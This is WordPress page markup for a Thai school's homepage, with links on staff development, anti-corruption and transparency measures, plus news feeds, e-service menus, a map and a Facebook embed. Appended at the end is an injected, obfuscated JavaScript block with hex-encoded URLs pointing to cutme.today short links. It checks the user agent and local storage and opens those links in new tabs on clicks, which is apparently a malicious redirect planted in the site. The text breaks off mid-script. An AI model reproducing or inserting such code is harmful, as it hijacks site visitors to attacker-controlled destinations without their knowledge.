900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"6fd1fd-18\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab6fd1fd-18\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"281735-c8\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab281735-c8\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\